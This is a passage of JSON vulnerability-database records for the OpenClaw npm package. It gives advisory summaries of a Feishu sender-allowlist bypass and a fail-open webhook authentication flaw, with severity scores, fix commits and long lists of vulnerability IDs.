                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35629",
                "GHSA-rhfg-j8jq-7v2h"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xpr3-hg3h-z3bz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89514?format=api",
            "vulnerability_id": "VCID-xryt-a83q-q7et",
            "summary": "OpenClaw: Feishu thread history and quoted messages bypass sender allowlist\n## Summary\nFeishu thread history and quoted messages bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Feishu because fetched quoted/root/thread context bypasses sender allowlists, and SECURITY.md does not exempt remote sender-allowlist bypasses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `f45e5a6569aab1d58cc6de25b19f1dc4c8779b85` — 2026-03-31T19:43:54+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41406",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14323",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14358",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41406"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41406",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41406"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-877v-w3f5-3pcq",
                    "reference_id": "GHSA-877v-w3f5-3pcq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-877v-w3f5-3pcq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41406",
                "GHSA-877v-w3f5-3pcq"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xryt-a83q-q7et"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90078?format=api",
            "vulnerability_id": "VCID-xsct-xjs7-nbab",
            "summary": "OpenClaw: Feishu webhook and card-action validation now fail closed\n## Summary\n\nFeishu webhook mode accepted missing `encryptKey` configuration as valid and blank card-action callback tokens as usable lifecycle tokens. Together, those fail-open paths could allow unauthenticated webhook or card-action traffic to reach command dispatch in affected deployments.\n\n## Impact\n\nA deployment using Feishu webhook mode without a configured `encryptKey`, or handling malformed card-action callbacks with blank callback tokens, could fail open instead of rejecting the request. Severity remains critical because affected webhook deployments expose a network-triggered path into OpenClaw command handling without the expected Feishu signature or replay protection.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` makes Feishu webhook and card-action validation fail closed. Webhook mode now refuses to start without an `encryptKey`, missing signing configuration returns invalid instead of valid, invalid signatures return `401`, and blank card-action callback tokens are rejected before dispatch.\n\nVerified in `v2026.4.15`:\n\n- `extensions/feishu/src/monitor.transport.ts` returns invalid when `encryptKey` is missing, refuses webhook mode without `encryptKey`, and rejects invalid signatures before JSON handling.\n- `extensions/feishu/src/card-action.ts` rejects blank callback tokens in the card-action lifecycle guard.\n- `extensions/feishu/src/monitor.webhook-security.test.ts` covers missing-`encryptKey` startup and transport rejection.\n- `extensions/feishu/src/monitor.card-action.lifecycle.test.ts` covers malformed blank-token card actions being dropped before handler dispatch.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `c8003f1b33ed2924be5f62131bd28742c5a41aae` via PR #66707\n\nThanks to @dhyabi2 for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44109",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00184",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3993",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00184",
                            "scoring_system": "epss",
                            "scoring_elements": "0.39934",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.42032",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44109"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66707",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66707"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44109",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44109"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xh72-v6v9-mwhc",
                    "reference_id": "GHSA-xh72-v6v9-mwhc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xh72-v6v9-mwhc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.15",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
